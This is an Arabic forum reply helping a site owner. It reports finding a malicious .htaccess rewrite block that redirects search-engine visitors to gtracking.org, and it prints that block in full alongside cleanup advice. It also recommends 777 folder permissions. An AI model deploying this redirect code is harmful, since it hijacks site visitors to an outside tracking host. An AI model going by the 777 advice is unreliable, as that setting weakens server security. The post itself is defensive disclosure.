اخوي سفير الروح
ترجع بالسلامة ونصيحة لك .. لا تتحدث عن عملك على شبكة الانترنت .. فربما هذا يضرك مستقبلاً ..
بخصوص الموقع تم اصلاح المشكلة ,, حيث وجدت ان المشكلة هي عدم تصريح مجلد الصور والملفات المباشرة بتصريح 777
واعطيته التصريح الصحيح وعمل بكل بساطة .
ايضاً وجدت اشكالية في موقعك حيث لفت انتباهي ملف الهاتكسس الموجود بدليل مركز التحميل واستعرضته وتفاجأت بوجود كود لا اعتقد انك تعرف عنه وهذا هو الكود ,
كود: تحديد الكل
# exgocgkctswo
RewriteEngine On
RewriteCond %{REQUEST_METHOD} ^GET$
RewriteCond %{HTTP_REFERER} ^(http\:\/\/)?([^\/\?]*\.)?(google\.|yahoo\.|bing\.|msn\.|yandex\.|ask\.|excite\.|altavista\.|netscape\.|aol\.|hotbot\.|goto\.|infoseek\.|mamma\.|alltheweb\.|lycos\.|search\.|metacrawler\.|rambler\.|mail\.|dogpile\.|ya\.|\/search\?).*$ [NC]
RewriteCond %{HTTP_REFERER} !^.*(q\=cache\:).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|apache|appie|AppleSyndication).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Archive|Argus|Ask\sJeeves|asterias|Atrenko\sNews|BeOS|BigBlogZoo).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|BlogsLive|BlogsSay|blogWatcher).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Bookmark|bot|CE\-Preload|CFNetwork|cococ|Combine|Crawl|curl|Danger\shiptop).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Diagnostics|DTAAgent|ecto|EmeraldShield|endo|Evaal|Everest\-Vulcan).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(exactseek|Feed|Fetch|findlinks|FreeBSD|Friendster|Fuck\sYou|Google).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Gregarius|HatenaScreenshot|heritrix|HolyCowDude|Honda\-Search|HP\-UX).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|iPhone|IRIX|Jakarta|JetBrains).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Krugle|Labrador|larbin|LeechGet|libwww|Liferea|LinkChecker).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(LinknSurf|Linux|LiveJournal|Lonopono|Lotus\-Notes|Lycos|Lynx|Mac\_PowerPC).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Mac\_PPC|Mac\s10|Mac\sOS|macDN|Macintosh|Mediapartners|Megite|MetaProducts).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Miva|Mobile|NetBSD|NetNewsWire|NetResearchServer|NewsAlloy|NewsFire).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(NewsGatorOnline|NewsMacPro|Nokia|NuSearch|Nutch|ObjectSearch|Octora).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(OmniExplorer|Omnipelagos|Onet|OpenBSD|OpenIntelligenceData|oreilly).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(os\=Mac|P900i|panscient|perl|PlayStation|POE\-Component|PrivacyFinder).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(psycheclone|Python|retriever|Rojo|RSS|SBIder|Scooter|Seeker|Series\s60).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(SharpReader|SiteBar|Slurp|Snoopy|Soap\sClient|Socialmarks|Sphere\sScout).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(spider|sproose|Rambler|Straw|subscriber|SunOS|Surfer|Syndic8).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Syntryx|TargetYourNews|Technorati|Thunderbird|Twiceler|urllib|Validator).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Vienna|voyager|W3C|Wavefire|webcollage|Webmaster|WebPatrol|wget|Win\s9x).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Win16|Win95|Win98|Windows\s95|Windows\s98|Windows\sCE|Windows\sNT\s4).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(WinHTTP|WinNT4|WordPress|WOW64|WWWeasel|wwwster|yacy|Yahoo).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Yandex|Yeti|YouReadMe|Zhuaxia|ZyBorg).*$ [NC]
RewriteCond %{HTTP_COOKIE} !^.*xccgtswgokoe.*$
RewriteCond %{HTTPS} ^off$
RewriteRule ^(.*)$ http://gtracking.org/cgi-bin/r.cgi?p=15001&i=aecaa68c&j=317&m=a24cd588cd30209b93be638a631b73dc&h=%{HTTP_HOST}&u=%{REQUEST_URI}&q=%{QUERY_STRING}&t=%{TIME} [R=302,L,CO=xccgtswgokoe:1:%{HTTP_HOST}:10080:/:0:HttpOnly]
# exgocgkctswo
بحثت عن مصدر هذا الكود في الانترنت وقد وجدت المواقع الاجنبية تتحدث عن كون هذا الكود خبيث ويتم زرعه في جميع ملفات الهاتكسس المتواجدة بالموقع وظيفته القيام بالتحويل على موقع مجهول وعندما حاولت استعراض الموقع قام بتحويلي بشكل مباشر على قوقل وبصراحة لا املك الوقت الكافي لفحصه ..
المهم هو أنه تم تنظيف الكود من ملفات الهاتكسس الموجودة بمركز التحميل فقط ولا زال الكود متواجد في جميع ملفات الهاتكسس بعموم الموقع ,,, لذا يجب ان تقوم بتنظيفها بشكل يدوي ,,
وايضاً لفت انتباهي وجود كود تحويل في ملف الهاتكسس الموجود في رئيسية الموقع يقوم بتحويل داخلي ولا اعرف من وضعه لك بملف الهاتكسس
كود: تحديد الكل
RewriteEngine on
RewriteCond %{HTTP_HOST} ^8amity.net [NC]
RewriteRule ^(.*)$ http://www.8amity.net/$1 [R=permanent,L]
RewriteCond %{HTTP_HOST} ^8amity.com$ [OR]
RewriteCond %{HTTP_HOST} ^www.8amity.com$
RewriteRule ^/?$ http://www.8amity.net [R=301,L]
اعتقد انه الكود يقوم بتحويل داخلي ولكن لا ارى علاقة بين دومينك والدومين الآخر ,,, هل لك علاقة بموقع
www.8amity.net ؟؟
عموماً يجب ان تخبر استظافتك بان الكود الاول على الارجح متواجد بجميع انحاء السيرفر لأنه ذكر باحد المواقع الاجنبيه بانه عبارة عن كود خبيث يتم تلغيمه في بعض السكربتات الخاصة بنظام ليونكس وربما ان مدير السيرفر قد قام بتركيب سكربت ما ونزل معه الكود بجميع يوزرات السيرفر ..
للمزيد ابحث في قوقل
http://www.google.com/search?q=http%3A% ... afe=active
ولسلامة موقعك يجب أن تقوم بتغيير جميع كلمات السر ومستخدمي قواعد البيانات ..
.
.
